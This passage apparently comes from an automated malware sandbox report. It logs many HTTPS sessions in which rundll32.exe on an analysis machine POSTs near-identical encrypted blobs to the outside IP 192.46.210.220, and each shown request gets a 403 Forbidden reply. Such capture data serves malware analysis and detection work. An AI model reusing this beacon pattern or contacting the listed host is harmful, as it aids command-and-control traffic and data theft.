                                                                                                      2021-10-28 02:48:01 UTC239OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:02 UTC249INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:02 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      49192.168.2.750020192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:02 UTC244OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:02 UTC244OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:02 UTC249INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:02 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      5192.168.2.749796192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:35 UTC24OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:35 UTC25OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:36 UTC29INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:36 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      50192.168.2.750027192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:06 UTC249OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:06 UTC249OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:06 UTC259INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:06 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      51192.168.2.750028192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:06 UTC254OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:06 UTC254OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:06 UTC259INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:06 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      52192.168.2.750035192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:11 UTC259OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:11 UTC259OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:11 UTC269INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:11 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      53192.168.2.750036192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:11 UTC264OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:11 UTC264OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:11 UTC269INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:11 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      54192.168.2.750043192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:14 UTC269OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:14 UTC269OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:15 UTC279INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:15 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      55192.168.2.750044192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:15 UTC274OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:15 UTC274OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:15 UTC279INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:15 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      56192.168.2.750063192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:18 UTC279OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:18 UTC279OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:19 UTC289INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:19 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      57192.168.2.750066192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:19 UTC284OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:19 UTC284OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:19 UTC289INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:19 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      58192.168.2.750082192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:22 UTC289OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:22 UTC289OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:23 UTC299INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:23 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      59192.168.2.750084192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:23 UTC294OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:48:23 UTC294OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:48:23 UTC299INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:48:23 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      6192.168.2.749800192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:37 UTC29OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
